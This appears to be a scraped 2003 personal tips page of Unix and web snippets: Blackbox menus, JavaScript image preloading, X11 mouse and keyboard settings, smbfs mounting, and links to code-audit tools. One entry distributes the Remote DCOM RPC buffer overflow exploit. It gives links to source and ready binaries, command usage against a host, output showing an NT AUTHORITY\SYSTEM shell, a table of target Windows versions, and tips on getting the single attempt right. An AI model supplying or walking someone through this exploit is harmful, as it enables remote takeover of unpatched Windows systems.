You need the edit the file /usr/X11R6/share/blackbox/menu to change your menu layout.
The menu file is pretty easy to understand 🙂
The file is found somewhere else on a linux system.
// Vladimirr.dk
You need the edit the file /usr/X11R6/share/blackbox/menu to change your menu layout.
The menu file is pretty easy to understand 🙂
The file is found somewhere else on a linux system.
// Vladimirr.dk
Unifix knowledge database – The original one
Dashboard – News – Search – List – About – Admin
Preload of images with JS
Author:vladimirr – Thu Aug 7 20:36:03 2003
<script language=”JavaScript”>
<!–
function PreLoad() {
if (document.images) {
img1 = new Image();
img1.src = “billede1.jpg”;
img2 = new Image();
img2.src = “billede2.gif”;
img3 = new Image();
img3.src = “billede3.jpg”;
}
}
//–>
</script>
Add the pictures above and place it in your <head> section of the website
(remeber to change the numbers)
Use <body onLoad=”PreLoad();”> to start the preloading on the site
// Vladimirr.dk
http://www.samba.netfirms.com/index.htm
//Vladimirr
Add the 'Option "ZAxisMapping" "4 5"' to your Mouse section, could look like this (on freebsd, might me a little different elsewhere but the zaxis part should be similare)
Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "ZAxisMapping" "4 5"
Option "Protocol" "auto"
Option "Device" "/dev/sysmouse"
EndSection
Add the following to your kernel options NETSMB options SMBFS options NETSMBCRYPTO options LIBMCHAIN options LIBICONV compile,install, boot and mount with this cmd peanut# mount_smbfs -I 192.168.10.122 //mikr@ost/c$ /mnt Password:
Files: Source: http://base.fujang.dk/files/mike/dcom.c (include <error.h> removed) Freebsd binary: http://base.fujang.dk/files/mike/dcom Windows binary: http://base.fujang.dk/files/mike/dcom.exe + cygwin1.dll The windows binary is compilled by padde (www.beastie.dk) modifications has been made to make it compile under cygwin, the source file avail here was not used to compile this binary. Windows usage: C:\>domc 0 192.168.10.123 --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Using return address of 0x77e81674 - Dropping to System Shell... Microsoft Windows 2000 [version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32>whoami whoami NT AUTHORITY\SYSTEM C:\WINNT\system32> Unix usage: bash$ ./dcom 0 192.168.10.123 --------------------------------------------------------- - Remote DCOM RPC Buffer Overflow Exploit - Original code by FlashSky and Benjurry - Rewritten by HDM <hdm [at] metasploit.com> - Using return address of 0x77e81674 - Dropping to System Shell... Microsoft Windows 2000 [version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> The leading zero must be set to one of the following, and describe the target system. - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP1 (english) - 2 Windows 2000 SP2 (english) - 3 Windows 2000 SP3 (english) - 4 Windows 2000 SP4 (english) - 5 Windows XP SP0 (english) - 6 Windows XP SP1 (english) Thoug it says english, i have successfully tested this against several danish versions as well. You will most likeley have only one shot at this one because the vuln. service will crash after one try. Also after successfully exploiting this you wont be able to exploit again because the services craches. For more information, read the source. Looks as though the service continue running during the shell, to restart the shell type : net start rpcss , wont help you to start this from the shell, gotta be done afterwards.
As most danish hackers have discovered, DK keyboard layout really sucks when it comes to programming/codehacking. But running entirely using US keyboard layout doesn't work either, because you need to write the Danish special characters, æ, ø, and å. There is, however, a solution to this. It requires you to run Xfree86 version 4.2.0 or later. In the XF86Config file, Set the layout to us,dk and as options use grp:caps_toggle . You can also use it as a command in your .xinitrc or .xsession file, then the syntax is setxkbmap -rules xfree86 -layout "us,dk" -option "grp:caps_toggle".
IF you have the source code you can check out the following links: http://www.dwheeler.com/flawfinder/ http://www.cigital.com/its4/ http://www.securesoftware.com/download_form_rats.htm http://www.cs.wisc.edu/~bart/fuzz/fuzz.html (MAYBE?) ELSIF YOU ONLY HAVE THE BINARY THEN Checkout the blackhat presintations like: http://www.blackhat.com/html /bh-europe-00/bh-europe-00-speakers.html#HalVar
Taken from FreeBSD quotes
Need to remove all those ^M characters from a DOS file? Try
col -bx < dosfile > newfile
An easy guide to network programming in C: http://tinyurl.com/685d /secor